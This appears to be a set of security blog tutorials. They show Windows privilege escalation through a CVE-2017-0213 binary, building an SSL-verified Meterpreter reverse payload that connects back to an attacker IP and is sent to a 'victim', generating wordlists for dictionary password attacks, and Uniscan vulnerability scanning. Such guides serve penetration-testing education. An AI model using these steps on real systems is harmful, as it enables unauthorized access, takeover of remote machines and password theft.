Bypass Admin access through guest Account in windows 10

Open command prompt and check windows user account status using “whoami” command.

Account name is “joe” and account status is ‘DefaultAccount’ which is a non-administrator account type.

Try changing administrator using the ’net user’ command. You will see an error ‘Access is denied’

Now download “CVE-2017-0213_x64” from here and unzip in your PC. Go to the folder and you can find the .exe file, double click on it to run it.

The moment you double click on it, it will automatically open a new command prompt with administrator privileges.

Use ‘net user’ command to change the administrator account password. Message ‘The command completed successfully’ will appear. You have now successfully changed the administrator accounts password.

Author– Abhimanyu Dev is an Aspiring Cyber Security Expert Contact Here

Create SSL Certified Meterpreter Payload using MPM

Through this article you can learn how an attacker would able to generate a SSL certificate for any exe or bat file payloads so that he might be able to establish a connection with host through meterpreter session.

The firewall spoof the network traffic and verifies trust certificates to establish connection itself as a trusted third party to the session between the client and the server. When the client begins with an SSL session with the server, the firewall capture the client SSL request and forwards the SSL request to the server. The server sends a certificate for the client that is captured by the firewall. If the server certificate is signed by a CA that the firewall trusts, the firewall generates a duplicate of the server certificate signed by the Forward Trust certificate and forward the certificate to the client to authenticate. 

Meterpreter_Paranoid_Mode.sh allows users to secure your staged/stageless connection for Meterpreter by having it check the certificate of the handler it is connecting to.

Open the terminal in your kali Linux and type following to download it………….

Git clone https://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL.git

Once it downloaded run the program file and follow the given below steps.

Press enter to continue

A prompt will open in which you have to choose option for building certificate from given screenshot you can read I had chosen impersonate domain.

We start by generating a certificate in PEM format, once the certs have been created we can create a HTTP or HTTPS or EXE payload for it and give it the path of PEM format certificate to be used to validate the connection.

After that again another prompt will open in which you would be ask to mention the domain name, here the SSL certificate will generate for www.hackingarticles.in

To have the connection validated we need to tell the payload what certificate  the handler will be using by setting the path to the PEM certificate in the HANDLERSSLCERT option then we enable the checking of this certificate by setting stagerverifysslcert to true.

 PEM is a widely used encoding format for security certificates. Syntax and content is defined by X.509 v3 standards for digital certificates, defined in IETF RFC 5280 specifications. The main file extensions are .pem, .crt, .ca-bundle. A PEM certificate is a base64 (ASCII) encoded block of data encapsulated between.

In next prompt choose payload category for auto building payload, from given list I chose stagless (payload.exe)

Once that payload is created we need to create a handler to receive the connection and again we use the PEM certificate so the handler can use the SHA1 hash for validation. Just like with the Payload we set the parameters HANDLERSSLCERT with the path to the PEM file and stagerverifysslcert to true.

 We can see the stage doing the validation when we recite a session back.

Enter LHOST 192.168.0.108 (attacker’s IP)

Similarly given any random port for reverse connection from host system and click on ok.

Enter lport 8888

Again list of payload will open from that prompt choose desire payload which will generates payload for attack.

Windows/meterpreter_reverse_http

This will configure all setting and start multi handler by lunching metasploit framework

When you move inside output folder here you will get two files; first for exe payload another for .pem certificate. Now use your effort for sharing exe file with your victim and wait for session establishment through meterpretre.

On other hand you can compare .pem certificate from other original certificate signed by CA, if you will observe given below image you can read certification details for hackingarticles.in which as similar as CA singed certificates.

Hence you can see I have successfully established the meterpreter session with victims system.

Try it by yourself!!!

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

5 Ways to Create Dictionary for Bruteforcing

We live in digital era, and in the world of technology everything is password protected. There are many ways to crack the password such as social engineering, try and error method, etc. but the three only two most successful methods of password cracking i.e. Dictionary attack and Brute force. Both of them has there perks and disadvantages. And in today’s article we will focus on dictionary attack as it comes handy and is the best method to crack a password.

Dictionary attack: Dictionary attack is an attempted entry in a digital system which uses a precompiled list of possible passwords rather entering them one at a time. Basically, it an evolved and advanced form of trial and error as it brings result fast and is efficient. I am sure that there are many ways for a dictionary attack but I am going to give you five best ones.

Crunch

The first is Crunch. The best thing about crunch is you can use it both offline and online. It generates wordlist according to your requirements. You can give maximum and minimum length of the password and also provide it with a character-set which you want it use while creating your dictionary. And then crunch will create you dictionary while keeping your requirements at its priority. Hence, a dictionary will be created with all the possible combinations.

Now let’s see how to use it. Observe its syntax first:

crunch <min> <max> <character-set> -t <pattern> -o <path>

crunch àcrunch is the key word which notifies the system to use this tool.

<min> à here you specify the minimum length characters you want.

<max> àhere you specify maximum length of characters.

<character-set> àhere you specify the characters you want it to use while creating the dictionary.

-t <pattern>à this is optional but here you can specify pattern in with you want your character-set to be.

-o <path> à here you give the path where you want your dictionary file to be saved.

For instance open the terminal of kali and type:

crunch 3 4 ignite –o /root/Desktop/dict.txt

Now the above command will create dictionary with the possible combinations from the word ignite which will length from 3 to 4 characters. The file will be saved in text form on the Desktop. Similar is shown in the image below:

Let’s now read dict.txt file and for that type:

cat dict.txt

All the words will be displayed the following manner:

Cewl

Next way is by using Cewl. Now Cewl works somewhat like John The ripper and is written in ruby. When targeting people of corporate sector or business world; this is the tool for you. As you all know it is in human psyche to use the words significant to them and which occur in their day to day life. Cewl works on the URL you provide it. It will take that URL and crawl its way to the depth of 2 links (by default, you can increase or decrease the depth to) and will search every word which has the possibility of being a password. With all these words it will generate a wordlist for you to use as your dictionary in dictionary attack. Let’s observe it syntax:

  • cewl <url> -d<depth> -w<path>
  • Cewl à indicated the tool which is being used
  • <url> à here give the URL that you want to use as a foundation of your dictionary.
  • -d<depth> à here, give the number of links you want it to go through while creating your dictionary.
  • -w<path> à here, give the path where you want to store all the possible passwords.
  • For example in the terminal of kali type :

cewl www.ignitetechnologies.in –d 2 –w /root/Desktop/dict.txt

The above command will create a dictionary file using the word from the URL.

Let’s look the dictionary file it just created and for that type:

cat dict.txt

 All the words will be displayed in following manner:

Cupp

Our next way is using a third party tool i.e. cup. Previous tools were pre-installed but you will have to install this one on your own. To install it please type:

git clone https://github.com/Mebus/cupp.git

CUPP is developed in python and makes very personalized tool when it comes to password cracking. Studies show that while setting up password, humans show a similar pattern such as they tend make password personalize by adding their date of birth, anniversary date, pet’s name, etc. and CUPP focuses on this weakness and helps to crack password effectively. Before creating a wordlist, it will ask you required information about your target. And will create the wordlist as per the information. Now, let’s study how it works set-by-step. Initiate cupp first by typing:

./cupp.py –i

Once initiated it will ask you the information about your target as shown in the image:

Give the required information and your wordlist will be generated as follows:

Pydictor

Next up tool is Pydictor. This is a special tool as it is the only tool that creates the wordlist both in normal words and in base64 encryption. So if someone is smart enough to keep a safe password this tool will help you with it. Pydictor is written in python. There are two method to crack the password using this tool à one creates a normal wordlist the other creates wordlist in base64 form. We will try both the methods. But first things first, this is a third party tool so we will have to install it and for it please type :

git clone https://github.com/LandGrey/pydictor.git

Once the tool is installed and ready to use, give it instructions on bases of what you want it to generate the wordlist using. Understand the syntax first:

./pydictor.py –len <min> <max> -base d –o <path>

  • ./pydictor.py à initiates the tool
  • –len à indicates the length of characters
  • <min> à here, give minimum length of characters
  • <max> à here, give maximum length of characters
  • -o à indicates the path
  • <path> à here, give path where you want your wordlist to be saved

Let’s give the command to generate the wordlist now:

./pydictor.py –len 5 5 –base d –o /root/Desktop/dict.txt

Let’s read the file created to have a look at the words that it has generated. And for that type:

cat dict.txt/BASE_5_5_d_071743.txt

The other method using the similar tool gives us password in base64 encoding. Let’s study the syntax first:

./pydictor.py –len <min> <max> -base d –encode <encoding type> –o <path>

  • ./pydictor.py à initiates the tool
  • –len à indicates the length of characters
  • <min> à here, give minimum length of characters
  • <max> à here, give maximum length of characters
  • –encode à indicated the type of encryption/encoding
  • <encoding type> à here, give the type of encoding you want
  • -o à indicates the path
  • <path> à here, give path where you want your wordlist to be saved

Let’s give the command to generate wordlist:

./pydictor.py –len 5 5 –encode b64 –o /root/Desktop/dict.txt

The above command will generate wordlist in base64 let’s have a look at it:

cat dict.txt/BASE_5_5_d_070433.txt

Dymerge

The last and next up tool is Dymerge. Dymerge is interesting and powerful tool made in python. Basically what dymerge does is takes the previously made multiple dictionaries and merges them into a single one, so all the dictionaries can you use in one go while you sit back and relax. You can merge any number of dictionaries either default ones or custom made. This is again a third party tool so let’s install it first:

git clone https://github.com/k4m4/dymerge.git

 

Let’s understand its syntax:

python dymerge.py <path> <path> -s –o <path>

  • Python dymerge.py à initiates the tool
  • <path> à here, give path of the first dictionary you want to merge
  • <path> à here, give path of the second dictionary you want to merge
  • -o à indicates the path where the resulted wordlist will be saved
  • <path> à here, give the path where the final wordlist list will be saved

Now that we have understood the syntax let’s try the command:

python dymerge.py /root/Desktop/digit.txt /root/Desktop/words.txt –s –o /root/Desktop/dict.txt

Here, I have taken two wordlists (you can take more also), where one contains numbers and other contains alphabets and merges them into one so you can use multiple dictionaries at the same time.

Let’s have a look at the dictionary that it has created:

cat  dict-1.txt

These are the five powerful and efficient ways to password cracking. Enjoy and explore these fo0r both hacking and recovering passwords. Have fun!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

Scan Website Vulnerability using Uniscan (Beginner Guide)

Through this article we are trying to elaborate the word Enumeration using Kali Linux tool UNISCAN.

Uniscan is a simple Remote File Include, Local File Include and Remote Command Execution vulnerability scanner as well as work as enumerating tool in order to gather information like open ports and protocol related to target and investigate it against any vulnerability.

Let’s start!!!

Open the terminal and type following command using –j option for server fingerprints

uniscan -u http://testphp.vulnweb.com/listproducts.php?cat=1 -j

It will start enumeration from PING by sending icmp packets to targeted server and establish the connection.

Further it will use TRACEROUTE to show the path of a packet of information took from source to destination and list all the routers it travels through or fails to and is discarded. In actually, it will inform you how long each ‘hop’ from router to router takes.

NSLOOKUP is a program to query Internet domain name servers (DNS). NSLOOKUP or Reverse DNS (rDNS) is a method of resolving an IP address into a domain name

Uniscan made use of NMAP for aggressive scan against the targeted server to identify open ports and protocols services hence from screenshot you can observe the result.  It also enumerates the target using NMAP NSE script to identify the vulnerability and details of running services.

Now type following command for dynamic scan against the targeted server using –d option.

uniscan -u http://testphp.vulnweb.com/listproducts.php?cat=1 -d

 Now it will load the selected plug-in for fetching more details related to targeted server.

From given screenshot you can observe the result where it came up with an email id moreover loaded further plug-in for scanning vulnerability like sql injection, remote or local file inclusion and xss.

From given below screenshot you can see it has used blind sql injection and return a link of the targeted web pages. Similarly it will test for xss and remote or local file inclusion vulnerability.

Now type next command using –q option to enable directory test in targeted server

Uniscan –u http://192.168.1.1107 –q

Form scanning result you can read the fetched directories.

Last but not least use –g option for web fingerprints with following command

Uniscan –u http://192.168.1.1107 –g

Here we have come across available http option GET, HEAD, POST, OPTION, and TRACE which might help in verb tampering.

It will try to find out web service and error information and type of error as shown in given image.

Here this tool inserts a string in html in order to grab banner moreover we have come across the credential of web server and from given screenshot you can read login msfadmin: msfadmin

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

 

Related Posts Plugin for WordPress, Blogger...